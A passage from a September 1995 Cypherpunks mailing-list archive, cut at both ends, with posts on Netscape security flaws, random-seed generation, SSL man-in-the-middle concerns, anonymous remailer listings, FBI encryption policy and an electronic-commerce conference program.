that would "allow hackers access credit card numbers." As usual, they got it all wrong, but what do you expect? - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGa29CS9AwzY9LDxAQHJwAQAlCcmPauUPnBIpBx5e5ZZpdnQZk5dhEMe BMZe+aA+A0mZ6aqgiA8wzZyjbSkYMuzoUM+IQi4c4MraoWNXGAFfO+9dL4WMmdqI AMBk6WaIoiYjCjCd7SNxETlh4+BaWICul/04isiiLE345j6VgU2xGtJZT4UJMurf 6/dy7ztSYEQ= =P3jw -----END PGP SIGNATURE----- From jya at pipeline.com Mon Sep 25 10:06:52 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Sep 95 10:06:52 PDT Subject: WSJ on Netscape Hole 3 Message-ID: <199509251351.JAA11538@pipe4.nyc.pipeline.com> The Wall Street Journal, September 25, 1995, p. B12. Netscape Software for Cruising Internet Is Found to Have Another Security Flaw By Jared Sandberg Another security flaw that has long plagued the Internet has been found in software by Netscape Communications Corp. and others, raising concerns for the privacy and safety of information on the global computer network. The flaw in Netscape's popular Navigator software, which helps users cruise the multimedia portion of the Internet known as the World Wide Web, is the third defect in the software discovered by the "Cypherpunks" discussion group in little over a month. Members of the Cypherpunk group, which includes mathematicians and hackers who discuss the security method of cryptography, last month broke Netscape's "key" that protects sensitive data by "brute force" -- the use of massive computing power. Last week, other members found a flaw that could let hackers essentially pick the lock in Netscape's software. Unlike the prior glitches, however, the latest flaw doesn't lend itself to the theft of multiple credit-card numbers. Instead, it could allow a savvy hacker to damage an Internet user's computer, such as crashing the computer or deleting files. "This is just another indication that Netscape isn't being careful," said William Cheswick, a security researcher at AT&T Corp.'s Bell Laboratories. Still, he said, the flaw goes well beyond Netscape. It first reared its head seven years ago when Cornell graduate student Robert Morris used it to create a "worm" that crippled thousands of computers on the Internet. Last February, the same kind of flaw was found in the popular Mosaic program created by the University of Illinois. But that strain of the flaw was more serious than its latest appearance because it affected the computers that store many users' credit-card numbers. Now experts are discovering that the flaw shows up in other so-called Web browsers such as Links and Arena. "We're so glad that the network dog dances, we don't realize that it's rabid," Mr. Cheswick said of the programming quality of many software packages. Marc Andreessen, vice president of technology at Netscape, said the company will issue fixes for the recent glitches later this week. He added that it's unclear whether anything other than temporarily crashing a user's computer could result trom the recent flaw. But, he said, once users adopt the modified software, "this won't be around long enough to cause a problem." Some, however, worry that another variation of the flaw will prove more difficult to cope with in the coming months. Bruce Fancher, president of Phantom Access Technologies Inc., operator of the Mindvox Internet access service, said a variation of the security hole has been found in several Unix software packages, which run on thousands of Internet computers that contain user's credit-card numbers and other personal information. It could cause far more damage than the Netscape flaw, he said. "This is going to be a big problem," warned Mr. Fancher, adding that he's been told that hackers are already devising software toolkits to exploit the hole. "This flaw is an easy mistake to make, but it's also easy to fix," he said. The latest flaw came to light early Friday morning when a reader of the Cypherpunk mailing list discovered the glitch and posted a message to the Internet. Basically, the software on an end-user's machine allows for commands that are too long, letting an intruder tack on an extra line of damaging code that could crash the computer. Instead, the software should verify the length of the commands that computers accept. Security buffs concede that the recent round of security glitches found in several pieces of software, including a virus found in Microsoft Corp.'s Word program and security problems at Amefica Online Inc., has shaken confidence in electronic commerce. But they say the publicity brings to light problems that will ultimately make software more secure. Richard Lethin, a graduate student at Massachusettes Institute of Technology who participates in the Cypherpunk discussion, said: "This technology for electronic commerce is ultimately going to be real important, but there might be some hiccups at the start." [End] From dmandl at panix.com Mon Sep 25 10:07:19 1995 From: dmandl at panix.com (dmandl at panix.com) Date: Mon, 25 Sep 95 10:07:19 PDT Subject: (Another) WSJ article Message-ID: Netscape Software for Cruising Internet Is Found to Have Another Security Flaw Another security flaw that has long plagued the Internet has been found in software by Netscape Communications Corp. and others, raising concerns for the privacy and safety of information on the global computer network. The flaw in Netscape's popular Navigator software, which helps users cruise the multimedia portion of the Internet known as the World Wide Web, is the third defect in the software discovered by the "Cypherpunks" discussion group in little over a month. [end of excerpt--it's a long article] The article quotes William Cheswick and Rich Lethin, and mentions the cypherpunks several times. --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From raph at CS.Berkeley.EDU Mon Sep 25 10:08:09 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 25 Sep 95 10:08:09 PDT Subject: List of reliable remailers Message-ID: <199509251350.GAA05287@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"syrinx"} = " cpunk pgp hash cut reord mix post"; $remailer{"ford"} = " cpunk pgp hash ksub"; $remailer{"hroller"} = " cpunk pgp hash mix cut ek"; $remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord"; $remailer{"robo"} = " cpunk hash mix"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; $remailer{"ncognito"} = " cpunk"; $remailer{"precip"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"ecafe"} = " cpunk"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. News: the remailer list has been rewritten, and the new version is live! It should be more accurate, reliable, and faster than before. Penet is back up! Enjoy. remailer email address history latency uptime ----------------------------------------------------------------------- robo robo at c2.org ##*#####+### 1:51 99.99% hroller hroller at c2.org ########+### 1:47 99.99% syrinx syrinx at c2.org -+++--+--+-+ 51:38 99.98% ford remailer at bi-node.zerberus.de +*--*++**+*# 16:30 99.98% mix mixmaster at remail.obscura.com ._..-+.-++- 4:38:15 99.98% crown mixmaster at kether.alias.net --++------++ 1:51:07 99.97% alumni hal at alumni.caltech.edu *+##+*-*##*# 6:32 99.97% gondolin mixmaster at gondolin.org --_.-+---+** 3:26:27 99.96% hacktic remailer at utopia.hacktic.nl ++****+***** 9:35 99.95% ecafe remail at ecafe.org *--** 35:01 99.95% bsu-cs nowhere at bsu-cs.bsu.edu **#+*# #*#+# 7:02 99.83% replay remailer at replay.com ++***- +**+* 10:10 99.75% flame remailer at flame.alias.net ++**++ ***** 25:42 99.74% extropia remail at extropia.wimsey.com ----.-.-.-- 12:36:15 99.63% rmadillo remailer at armadillo.com +++ + ++ ++ 51:06 99.29% spook remailer at spook.alias.net ----------- 2:55:48 99.14% portal hfinney at shell.portal.com #+####-## # 5:37 98.89% ideath remailer at ideath.goldenbear.com ---+__.-.- 12:16:28 98.18% penet anon at anon.penet.fi * + - - ++ 3:46:46 94.95% c2 remail at c2.org *+ * +- +++ 49:41 94.46% vishnu mixmaster at vishnu.alias.net +++-+++ *+* 23:25 93.99% rahul homer at rahul.net *#+#*****#*# 1:21 99.99% ncognito ncognito at gate.net ++ 6:59 9.32% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From mike at icanect.net Mon Sep 25 10:08:47 1995 From: mike at icanect.net (Michael Taht) Date: Mon, 25 Sep 95 10:08:47 PDT Subject: Key signing at Miami Convention Message-ID: <199509251301.JAA05080@alice.icanect.net> I am giving an internet security seminar at the "The Internet and World Wide Web" Conference at the Miami Hyatt Regency, tomorrow, tuesday, Sept 26, all day. I'll be armed with a laptop if there are folk attending that want to sign and exchange PGP keys. ________________ Michael -- Michael Taht | "You got me hummin" - B. Joel VP, Technical Stuff | "Ain't nobody's bizness" - Taj Mahal mike at icanect.net | "I'm from the government, http://www.icanect.net | I'm here to help" - Anon From jya at pipeline.com Mon Sep 25 10:09:08 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Sep 95 10:09:08 PDT Subject: JAV_jiv Message-ID: <199509251313.JAA08442@pipe4.nyc.pipeline.com> 9-25-95. NYPaper: "Making the PC Come Alive. A Software Language That Puts You in the Picture." By John Markoff A new computer language known as Java is an emerging technology that many industry experts expect to be the next big thing in computing. Just as popular World Wide Web "browser" software like Netscape has transformed the Web from a scientist's research tool into a consumer medium over the last two years, many computer industry researchers and executives predict that the Java programming language will transport the Web to the next level. JAV_jiv (17 kb) From bianco at itribe.net Mon Sep 25 10:09:45 1995 From: bianco at itribe.net (David J. Bianco) Date: Mon, 25 Sep 95 10:09:45 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <4454nu$da8@tera.mcom.com> Message-ID: <199509251256.IAA27310@gatekeeper.itribe.net> On Sep 25, 2:38, Phil Karlton sent the following to the NSA's mail archives: > Subject: Netscape "random" number seed generator code available || As is mentioned in the README, more will need to be done to find more || bits of entropy. (Too much of a good thing is still not enough.) || However the security team believes that the RNG seed is no longer the || weak link and candidate for attack. So I am personally volunteering || to have my had shaved if a discovered deficiency in this code results || in an easily attacked generated seed. [You will be expected to show || your work. :-)] || Will you put a picture up on http://www.netscape.com/ someone does find a problem? 8-) -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From bianco at itribe.net Mon Sep 25 10:10:14 1995 From: bianco at itribe.net (David J. Bianco) Date: Mon, 25 Sep 95 10:10:14 PDT Subject: SSL Man-in-the-middle In-Reply-To: Message-ID: <199509251247.IAA27297@gatekeeper.itribe.net> On Sep 25, 9:35, Eric Young sent the following to the NSA's mail archives: > Subject: Re: SSL Man-in-the-middle || || On Fri, 22 Sep 1995, David J. Bianco wrote: || > Has anyone given much thought to the feasability of a man-in-the-middle || > attack against an SSL (or other similar) transaction? To me, the || > possibility seems obvious, so I figure it must have been discussed before, || > though I haven't seen it. || .... || > Since neither the browser nor the server perform any authentication checks, || > neither Bob nor Alice know they are really speaking to Mallet. The best || > Alice can do is check the IP address of the client she's speaking to, but || || Ah, err, the infamious problem of Netscape Navigator refusing to talk to || SSL httpd's because they don't have a certificate issued by Verisign is || caused by the client authentication the Server certificate. || To get a Verisign signed x509 certificate requires quite a bit of proof || that your company is who they claim they are. So server authentication || is used. || Not so. VeriSign can only vouch for identity, not intention. I can fork out $300 (at last count) and get a signed certificate for my fake company. If the stakes are high enough, I can incorporate fairly cheaply, get a business license, and then I'd have a real company I could submit as. Or, if I'm lazy, don't have enough money, or unwilling to leave a paper trail, I'd break into someone's weakly secured server and steal their certificate. In either case, I've obtained a "legitimate" signed certificate for illegitimate purposes. That's why I don't think just verifying the signature on the certificate is nearly enough. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From rfb at lehman.com Mon Sep 25 10:10:42 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Mon, 25 Sep 95 10:10:42 PDT Subject: `Random' seed. In-Reply-To: <9509251229.AA23816@alpha> Message-ID: <9509251300.AA22090@cfdevx1.lehman.com> -----BEGIN PGP SIGNED MESSAGE----- From: m5 at dev.tivoli.com (Mike McNally) Date: Mon, 25 Sep 1995 07:29:01 -0500 I also have some doubts as to the randomness of this; I suspect that the kernel is rather deterministic in its scheduling practices. I don't think that anyone has suggested otherwise. I believe that `clock skew' was the underlying source of randomness that Matt Blaze mentioned in the message where I first saw that code. In any case, a number of people have expressed interest in seeing signs of non-random behavior. As far as I know, no one has said anything if they've found such signs. I've tried to find some, but only with very simple tests. I generated a quarter megabits and found that: - I can only compress it to about 32Kb, i. e. 256 k bits. Tim May has suggested that compressibility is getting to be a good metric for entropy. - It seems to contain roughly equal numbers of: * 0s and 1s * 00s, 01s, 10s, and 11s * etc. I forget how high I checked. - It contains some rather long sequences of 0s and 1s. I think on the order of 20. I have no idea how reasonable it would be to use this approach in Netscape, however if it were available as an option to generate, say 300 bits, I'd personally be plenty willing to let it chew up five minutes while I get my morning caffeine. I realize that some people would not. It certainly couldn't hurt to throw a few bits gathered this way into the mix. Also, it may be possible to get more than one bit of entropy per second using this approach, I was merely showing the code as Matt originally presented it. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGanppNR+/jb2ZlNAQE2jQQAx1dj/WjMK4XeNr4mZxyW6G9TKL1ZKqOE tkePnuEujXQDxoEy5UNGWo36NG1hn564wprdS5e4aCQwZaPhPOuXZTd9uPEWXdqq j5WyNmzBqmSIlCU+wlEVnBpYWbgxdPC1Lx8ckkxxX07+F3B+ftibrfB+t7ysDDPC LOJ2PCXr/7I= =8lGs -----END PGP SIGNATURE----- -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From jya at pipeline.com Mon Sep 25 10:11:04 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Sep 95 10:11:04 PDT Subject: Golden Coy Freeh Message-ID: <199509251253.IAA07006@pipe4.nyc.pipeline.com> The New York Times, January 25, 1995, p. D5. The F.B.I. Sting Operation on Child Pornography Raises Questions About Cryptography By Peter H. Lewis Federal agents swooped down on more than 125 homes and offices across the United States on Sept. 13, seizing computers and diskettes from people suspected of trafficking in child pornography over the America Online network. But to date, the number of arrests in the sting operation remains at 15. More arrests are expected, but why haven't more occurred? Last week, Louis J. Freeh, the director of the F.B.I., offered an oblique explanation for the seemingly low initial success rate. At least some of the suspected child pornographers had used data encryption software, Mr. Freeh said Thursday in remarks at an International Cryptography Institute conference in Washington. In other words, they had scrambled their computer files so that only someone with the password -- or with proper code-breaking skills -- could view the contents. Mr. Freeh wisely did not say whether the F.B.I. agents were able to decipher the encrypted files seized in the investigation. It would be foolhardy, from a law-enforcement perspective, to tip one's hand. If the head of the F.B.I. acknowledged that his agency was powerless to crack a cryptography program like Pretty Good Privacy, the stampede for that software on the Internet would make the run on Windows 95 look puny. From a political perspective, Mr. Freeh's coyness is shrewd as well. By making even a subtle suggestion that some child pornographers may walk free because of unbreakable cryptography, he gains more leverage in seeking Government-mandated controls over the use of encryption technology. Mr. Freeh said that encryption was a "public safety" issue, and he said law-enforcement agencies around the world "will not tolerate" the use of private data encryption to impede investigations. He said encryption had also been encountered in the Philippines in a plot to blow up an American jet and to assassinate Pope John Paul lI (in that case, at least, one can presume the code was cracked.) It seems worthwhile to point out that even if the suspects in the child pornography sting, called Operation Innocent Images, used cryptography, that did not provide evidence that they were doing something illegal. Our legal system is predicated on the belief that one is innocent unless proved guilty, and there is no exception clause for technology. "Fortunately we are not yet at the point where the mere use of encryption overcomes the presumption of innocence," said David Sobel, staff counsel for the Electronic Privacy Information Center in Washington. Another point to remember is that the F.B.I. identified more than 100 suspects, and gathered sufficient information to warrant raids, using existing laws and enforcement techniques. On the other hand, there is no denying that child pornographers use data encryption to keep co-workers, family members and police from discovering their secrets. "We are involved in a couple of jobs every week resolving some kind of a child pornography investigation," said Eric K. Thompson, president of Access Data Inc. of Orem, Utah, a private company that specializes in cracking encrypted files for corporations and Government agencies. The Government's elite codebreakers at the National Security Administration are prohibited by law from using their talents against American citizens. The F.B.I. has its own code-breaking experts, but it routinely calls on independent experts like Access Data to help on some cases. After eight years of breaking into encrypted files, ranging from situations involving secretaries who simply forgot their passwords for important memos to cases involving corporate computer systems that were encrypted by disgruntled employees, Mr. Thompson has concluded: "Basically, the criminal element is becoming more computer literate, and they are discovering encryption. Files are becoming more difficult to break." Dorothy Denning, an expert in cryptography and a professor of computer science at Georgetown University in Washington, said she recognized the importance of encryption for businesses seeking to protect information. At the same time, she said, she also recognized the problems that law-enforcement agencies face because of cryptography. "So many people had been saying people in law enforcement weren't having this problem, and I didn't believe that," Dr. Denning said. So in May, she said, she spent two days calling sources at law-enforcement organizations. "I came up with over 20 cases -- child pornography, terrorism, murder, embezzlement fraud, tax protesters, export violations -- and, in some cases, they were able to crack it, and others they couldn't," she said. What can be done? The Administration's plan is to seek voluntary compliance with a "key escrow" plan, which would enable citizens to use strong, private cryptography as long as a copy of the software "key" were made available to law enforcement officials. Last week, Mr. Freeh stressed that he preferred a voluntary approach. But "if consensus is impossible" on the encryption issue, he said, the F.B.I. might consider other approaches. The debate is certain to heat up as more information about Operation Innocent Images becomes known. There are no comforting answers, only an echo of advice from a time predating the Internet: There is no solution. Seek it wisely. [End] From m5 at dev.tivoli.com Mon Sep 25 10:12:28 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Mon, 25 Sep 95 10:12:28 PDT Subject: `Random' seed. In-Reply-To: <9509200915.ZM14792@glacius.alias.com> Message-ID: <9509251229.AA23816@alpha> Rick Busdiecker writes: > FWIW, I discussed this code briefly with an engineer at Netscape a > while back . . . . > signal(SIGALRM,printbit); > alarm(1); > while (1) > count++; I for one would be a little peeved if I found that my browser was consuming all available CPU bandwidth on my workstation. I also have some doubts as to the randomness of this; I suspect that the kernel is rather deterministic in its scheduling practices. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From rsnyder at janet.advsys.com Mon Sep 25 10:13:44 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Mon, 25 Sep 95 10:13:44 PDT Subject: Netscape for Linux? In-Reply-To: <199509250712.CAA01003@khijol> Message-ID: <199509251143.HAA19012@janet.advsys.com> khijol!erc at uunet.uu.net said: > As much as this might put me ad odds with certain parts of the CP > community, this seems quite reasonable to me. After all, why should > someone provide support for a platform which is not generating > revenue? I don't think any of us disagree with that. I think what we disagree about is getting Netscape to accept our revenue. :-) I've tried calling and emailing to buy a copy of Linux, and the answer was always, "It's not available for Linux." Despite what's on their FTP server. I mostly want the stronger crypto in the US only version, but Netscape has said they are trying to make that available for FTP, so I can wait. I also want Java, but no one has that yet, and they 2.0 will probably be available for Linux, so I can wait for that too. From jim at acm.org Mon Sep 25 10:14:56 1995 From: jim at acm.org (Jim Gillogly) Date: Mon, 25 Sep 95 10:14:56 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <445j6k$h03@tera.mcom.com> Message-ID: <199509251159.EAA08528@mycroft.rand.org> > jsw at neon.netscape.com (Jeff Weinstein) writes: > More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, > and feed it through the RNG hash. On Unix and PC systems we feed the > environment through the hash, so that would be a good place for a > concerned user to put some random stuff of their own. Interesting idea, but I have a (perhaps irrational) dislike for this idea. If Netscape wants to have its own netsceed.bin file to muck around with on my system, I'll authorize it to be set up, but I by god don't want it mucking around with my PGP setup. Network-aware programs must be more trusted than local-only programs, because they are the only kind that legitimately export information they glean from the local environment. If Netscape decided to ship the actual contents of my randseed.bin to somebody else (like escrow.fbi.org, for example) it might give them else a better edge on finding session keys for my PGP sessions... the privacy of which I value more even than I value my Netscape transactions. I'm nervous enough about all the Easter Eggs that have been reported in Netscape, like the secret keystroke shortcut to get to Fishcam, or the different behavior it exhibits when it finds a certain obscurely-named directory at the top level. If it starts peeking at my PGP environment, though, I'm drawing the line. No, thanks. In summary -- set up your own netsceed.bin if you want, but don't peek at my PGP randomness. Jim Gillogly Trewesday, 4 Winterfilth S.R. 1995, 11:57 From perry at piermont.com Mon Sep 25 10:19:57 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 25 Sep 95 10:19:57 PDT Subject: Netscape for Linux? In-Reply-To: <445hej$h03@tera.mcom.com> Message-ID: <199509251135.HAA13693@frankenstein.piermont.com> Jeff Weinstein writes: > > ... would be nice if we could get 128 bit keys, though ... (hint, > > hint). > > We are working this issue with the government. As soon as we can > make it available for download we will. In other words, we will never see it in our lifetimes -- the bureaucreeps aren't known for promoting the spread of strong crypto. By the by, are you guys going to be taking any action vis a vis the discovery of weak keys in RC4? Perry From perry at piermont.com Mon Sep 25 10:22:06 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 25 Sep 95 10:22:06 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <445j6k$h03@tera.mcom.com> Message-ID: <199509251137.HAA13703@frankenstein.piermont.com> Jeff Weinstein writes: > More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, > and feed it through the RNG hash. You should search for the PGPPATH environment variable rather than making assumptions about where it is... > On Unix and PC systems we feed the environment through the hash, so > that would be a good place for a concerned user to put some random > stuff of their own. Not a bad idea, but not a substitute for extracting enough bits of entropy on your own... Perry From rsnyder at janet.advsys.com Mon Sep 25 10:24:53 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Mon, 25 Sep 95 10:24:53 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <445j6k$h03@tera.mcom.com> Message-ID: <199509251138.HAA18954@janet.advsys.com> jsw at neon.netscape.com said: > More on the RNG stuff. On Unix systems we look for ~/.pgp/ > randseed.bin, and feed it through the RNG hash. On Unix and PC > systems we feed the environment through the hash, so that would be a > good place for a concerned user to put some random stuff of their > own. For UNIX, including the environment is pretty useless for determining a seed. On BSD-style machines, try a ps -uxeww. The environment is known by anyone who has access to the machine when the seed is generated, and possibly to many others, since some machines have SNMP daemons that will give out the process table, or may have the systat "service" turned on. The later two may not include the environment on most machines, but I believe it concievably could, and may be implimentation specific from UNIX to UNIX. I greatly applaud Netscape for "going public" with this information, and remaining open to suggestions despite the bad publicity it has been getting. One of the large corporations I work with is looking to do an electronic commerce with some pretty amazing $ amounts soon (at least, amazing to me), and I know I'm going to be asked about the security breaks. I feel confident that I can tell them exactly what is wrong, and what Netscape is doing to fix it, and that I don't think it should be a matter for great concern. I'm not sure I could have done that had Netscape done nothing but issue the press release and weather the bad press in silence. Bob From rah at shipwright.com Mon Sep 25 10:27:29 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 25 Sep 95 10:27:29 PDT Subject: Electronic Commerce Message-ID: --- begin forwarded text From: Ravi Kalakota Subject: Electronic Commerce To: www-buyinfo at allegra.att.com Date: Sun, 24 Sep 1995 23:52:47 -0600 (CDT) Mime-Version: 1.0 (If you have seen this before, we apologize ....) ---------------------------------------------------------- FINAL CALL for Participation International Conference on Electronic Commerce This posting includes: Final Program, Registration form, Hotel, and Speaker information. All other conference related information can be found at: ----> http://cism.bus.utexas.edu/ravi/ecomm.html Thanks, -- Ravi Kalakota and Andrew Whinston (Conference Organizers) If you are interested, please register quickly as we have limited space available and will not be able to accomodate more than conference room capacity. ************* FINAL PROGRAM *********** Sixth conference on Organizational Computing, Coordination and Collaboration INTERNATIONAL CONFERENCE ON ELECTRONIC COMMERCE Theme: Frontiers of Electronic Commerce October 30-31, 1995 ------------------- Sunday, October 29 6-7:00 p.m. Reception at Red Lion Hotel, 6121 North IH 35, Austin, Texas ------------------- Monday, October 30 7:45 a.m. Continental Breakfast 8:15 a.m. Welcome Address Session I: Internet-Based Commerce: The Promises and Pitfalls ------------------------------------------------ 8:30 a.m. An Unaffiliated View of Electronic Commerce Dave Crocker Brandenburg Consulting Issues in Electronic Commerce: The First Virtual Experience Nathaniel Borenstein First Virtual Holdings Session II: Electronic Payment Systems ------------------------------------------------ 10:30 a.m. Implementing Online Payments: The NetCash and NetCheque Systems Clifford Neuman USC/ISI Systems of Electronic Commerce: Payment and More Win Treese Open Market, Inc. Session III: Electronic Catalogs and Brokerages ------------------------------------------------ 1:30 p.m. Smart Catalogs and Virtual Catalogs Arthur M. Keller Stanford University and Commerce Net Organizing for Electronic Commerce Ravi Kalakota The University of Rochester Session IV: World Wide Web and Electronic Documents ------------------------------------------------ 3:30 p.m. Formalizing Web Technology Dan Connolly Massachusetts Institute of Technology/W3 Organization Document Issues in Electronic Commerce Larry Masinter Xerox Palo Alto Research Center ------------------------------------ 6:30 p.m.Banquet at Red Lion Hotel ------------------------------------ Tuesday, October 31 8:00 a.m. Continental Breakfast Session V: Internet Marketing and Demographics ------------------------------------------------ 8:30 a.m. Marketing on the Internet: Who is Making Money? Jill H. Ellsworth Oak Ridge Research Measuring the Internet Audience Donna Hoffman Vanderbilt University and Interval Research Corporation Session VI: Supply Chain Management ------------------------------------------------ 10:30 a.m.Electronic Commerce and Supply Chain Management Jan Stallaert The University of Texas at Austin Electronic Data Interchange Forrest Malone Electronic Commerce Resource Center Session VII: Economics and Electronic Commerce ---------------------------------------------------------- 1:00 p.m. Electronic Auctions and Application to Spread Spectrum Band-Width Allocations Preston McAfee Massachusetts Institute of Technology Product and Infrastructure Pricing Andrew Whinston and Dale Stahl The University of Texas at Austin Internet Service Providers: Changing Dynamics Smoot Carl-Mitchell and John Quarterman Zilker Internet Park, Matrix Information and Directory Services, Inc. Session VIII: Panel Discussion: Issues in Internet Commerce ------------------------------------------------ Su-Shing Chen, National Science Foundation James B. Rapp Richard Bolton, National Industrial Information Infrastructure Protocols Consortium (NIIIP) 5:00 p.m.Conference adjourns ************* REGISTRATION FORM *********** Name (Please type) _____________________________________ (Prof., Dr., Mr., Ms., Mrs.) First Last Title: _______________________________________ Organization: _________________________________ Address: ____________________________________ _______________________________________ City State Zip Code Country Telephone: (_____)__________ Work (_____)________Home Fax: (_____)__________ Email: __________________ Which days do you plan to attend? Sunday, Oct.29 ______ (Reception) Monday, Oct.30 ______ (Lunch) Monday, Oct.30 ______ (Banquet) Tuesday, Oct.31 ______ (Lunch) Registration Fee: Before October 13, 1995 ______ $300 : After October 13, 1995 ______ $395 (Payment must be made by check or money order payable to the RGK Foundation.) Please complete and mail this registration form along with registration fee before Friday, October 13, 1993 to: Electronic Commerce Conference RGK Foundation 1301 W.25th Street Suite 300 Austin, TX 78705 Phone: 512-474-9298 Fax: 512-474-6389 To register for the conference, complete and mail the Registration Form to the RGK Foundation at 1301 W. 25th Street, Suite 300, Austin, Texas 78705. Be sure to include a check for the registration fee payable to the RGK Foundation. The registration fee is $300 for registrations received before Friday, October 13 and $395 after October 13 and includes the reception on Sunday, the banquet on Monday evening, breakfast and lunch on Monday and Tuesday, coffee breaks, scheduled ground tranportation to and from the conference site, and conference materials. ************* HOTEL INFRORMATION *********** We have reserved a block of rooms at the Red Lion Hotel Austin Airport, 6121 North IH 35, Austin, Texas 78752. The special room rate of $89.00 single/double will be available for those who make reservations before Friday, October 13. After this date, the special rate and room availability cannot be guaranteed. Make your reservations by calling 512-323-5466 and mentioning the Electronic Commerce Conference. ************* SPEAKER INFRORMATION *********** 1. Nathaniel Borenstein Chief Scientist, First Virtual Holdings Nathaniel is a primary author of MIME, the Internet standard format for interoperable multimedia data, and the author of various widely used software packages, including the Andrew Message System, metamail, ATOMICMAIL, and Safe-Tcl. He specializes in end-user interfaces, and is the author of the book 'Programming As If People Mattered." 2. Clifford Neuman Research Assistant Professor, University of Southern California and Scientist, USC Information Sciences Clifford Neuman is a scientist at the Information Sciences Institute of the University of Southern California USC) and holds a research faculty appointment in the Computer Science Department. After receiving a S.B. degree from the Massach usetts 